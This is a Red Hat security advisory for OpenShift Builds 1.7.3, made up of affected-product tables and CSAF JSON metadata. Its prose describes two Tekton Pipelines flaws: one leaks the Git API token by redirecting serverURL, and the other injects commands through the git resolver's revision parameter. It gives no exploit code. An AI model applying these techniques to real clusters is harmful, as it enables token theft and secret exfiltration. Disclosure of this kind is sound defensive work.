| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64 | — |
Threats
Impact
Important
A flaw was found in Tekton Pipelines. A tenant with permissions to create TaskRun or PipelineRun resources can exploit this vulnerability. By omitting the Git API token parameter and pointing the serverURL to an attacker-controlled endpoint, the system-configured Git API token (such as a GitHub Personal Access Token or GitLab token) can be sent to the attacker. This information disclosure allows for the exfiltration of sensitive API tokens.
7.7 (High)
Affected products
Fixed
24 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64 | — |
Workaround
|
Threats
Impact
Moderate
A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver's revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.
8.5 (High)
Affected products
Fixed
28 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
9 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64 | — |
Workaround
|
Threats
Impact
Important
References
28 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Builds 1.7.3",
"title": "Topic"
},
{
"category": "general",
"text": "Releases of Red Hat OpenShift Builds 1.7.3",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:24359",
"url": "https://access.redhat.com/errata/RHSA-2026:24359"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-32280",
"url": "https://access.redhat.com/security/cve/CVE-2026-32280"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40161",
"url": "https://access.redhat.com/security/cve/CVE-2026-40161"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40938",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/builds_for_red_hat_openshift/1.7",
"url": "https://docs.redhat.com/en/documentation/builds_for_red_hat_openshift/1.7"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_24359.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Builds 1.7.3",
"tracking": {
"current_release_date": "2026-06-09T08:30:07+00:00",
"generator": {
"date": "2026-06-09T08:30:07+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.2"
}
},
"id": "RHSA-2026:24359",
"initial_release_date": "2026-06-08T05:19:34+00:00",
"revision_history": [
{
"date": "2026-06-08T05:19:34+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-08T05:19:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-09T08:30:07+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Builds 1.7.3",
"product": {
"name": "Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_builds:1.7::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Builds"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Aa286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9\u0026tag=1780373846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9\u0026tag=1780374151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-bundler-rhel9@sha256%3A07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9\u0026tag=1780373867"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-image-processing-rhel9@sha256%3Aba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9\u0026tag=1780373835"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-rhel9-operator@sha256%3A5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator\u0026tag=1780480839"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-operator-bundle@sha256%3Afcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds/openshift-builds-operator-bundle\u0026tag=1780485589"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
